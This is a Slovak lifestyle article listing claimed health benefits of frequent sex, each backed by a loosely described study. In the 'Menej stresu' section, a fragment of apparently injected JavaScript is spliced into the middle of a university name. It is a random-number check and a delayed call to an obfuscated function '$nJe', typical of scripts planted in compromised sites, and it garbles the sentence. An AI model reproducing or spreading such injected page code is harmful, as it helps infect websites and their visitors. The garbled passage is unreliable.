Sex ako liek

| máj 19, 2019

Nemusí to byť len príjemné, ale aj zdraviu prospešné. Štúdie od odborníkov z celého sveta priniesli s dôkazmi, ktoré hovoria o tom, že sex poskytuje okrem potešenia aj rôzne zdravotné benefity. A toto sú dôvody, prečo by ste sa mali vašim posteľným radovánkam odovzdávať tak často, ako je to len možné.

Menej stresu

Výskumníci na Univerzite v Marylandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}ande a v Soule v Južnej Kórei robili pokusy na potkanoch a myšiach. Tie ukázali, že sex vám síce nepomôže k tomu, aby ste vo svojich hlavách vyriešili ľavou zadnou diferenciálne rovnice, avšak vaše mozgové funkcie začnú pracovať výkonnejšie. Môže za to odbúravanie stresu, ktorú má táto činnosť za následok.

Silnejšia imunita

Ako často? Podľa čísel z Univerzity vo Wilkes by optimálna frekvencia sexuálnej aktivity mala byť aspoň raz, alebo dvakrát týždenne. Už toto číslo stačí nato, aby sa imunita zlepšila a pomohla vám lepšie prekonať nachladnutie, alebo chrípku. Za toto zistenie možno údajne vďačiť vysokoškolským študentom. Náhoda?

Lepší pracovný výkon

Jeden známy človek raz povedal, že jeden šťastný a spokojný zamestnanec je lepší, ako traja nespokojní. Štátna univerzita v Oregone otestovala 159 zamestnancov. Tí boli po pohlavnom styku na druhý deň v práci oveľa šťastnejší. Ich spokojnosť viedla k vyššiemu nasadeniu aj v pracovných povinnostiach. Chcete byť povýšená? Recept je možno veľmi jednoduchý.

Zbaví vás kŕčov

Aj keď ide o staršiu štúdiu, z 1900 žien takmer 10% potvrdilo, že masturbujú preto, aby sa zbavili menštruačných kŕčov. Prečo však rovno nepotešiť aj partnera? Sex počas “svojich dní” už nie je žiadne tabu. Ak nerobí problém ani vašej polovičke, len smelo do toho.

Spomalí starnutie

Škótsky výskumník a klinický neuropsychológ  David Weeks podrobil štúdiu 3500 európskych a amerických mužov a žien, ktorých rozdelil do skupín, pričom jedna z nich si posteľnú gymnastiku dopriala 2 až 3-krát týždenne. Hádajte, ktorá z týchto skupín vizuálne omladla o 7 až 12 rokov. Za pokus to rozhodne stojí.

Foto: marieclaire.com

Tags:

Category: HOMEPAGE, ZDRAVIE a FIT

Comments are closed.